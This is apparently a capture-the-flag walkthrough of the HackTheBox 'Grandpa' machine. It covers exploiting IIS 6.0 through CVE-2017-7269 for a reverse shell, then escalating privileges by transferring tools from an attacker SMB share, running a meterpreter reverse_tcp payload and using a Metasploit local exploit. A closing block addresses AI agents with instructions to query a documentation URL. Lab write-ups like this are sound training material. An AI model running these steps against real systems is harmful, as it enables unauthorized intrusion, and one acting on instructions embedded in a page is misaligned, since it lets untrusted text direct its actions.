# Grandpa

I rated this box medium, because I did it with Metasploit and it would have taken more effort and different steps to do it without, which was not easy for me at the time.

## Initial Access

nmap:

```
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
OS: Windows older than Server 2008 or Windows 7
```

Searching for the IIS version I find CVE-2017-7269 everywhere. There is a PoC:

{% embed url="<https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell>" %}

This worked and I have a shell as network service.

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2Fdi65G9MgyXyBWcABQA1l%2Fimage.png?alt=media&#x26;token=dd0481d9-e4b8-44d8-a546-8884429a87a4" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

`C:\>whoami /priv`

whoami /priv

```
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
```

With the SeImpersonate privilege we should be able to privesc using Printspoofer.

With smbserver.py I transferred the printspoofer exploit on the host. For this to work I needed to find the writeable directory C:\wmpub\wmiislog.

`sudo smbserver.py -smb2support soos .`

`copy \\10.10.16.2\soos\PrintSpoofer32.exe .\PrintSpoofer32.exe`

This did not work and made the shell inaccessible.

I transferred a windows/meterpreter/reverse\_tcp payload to the host and ran it:

`cmd shell.exe`

I then used this exploit to get system: windows/local/ms14\_058\_track\_popup\_menu

I know that this is the easy way and you should be able to do this without metasploit.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shibudocs.gitbook.io/htb-writeups/boxes-easy/grandpa.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.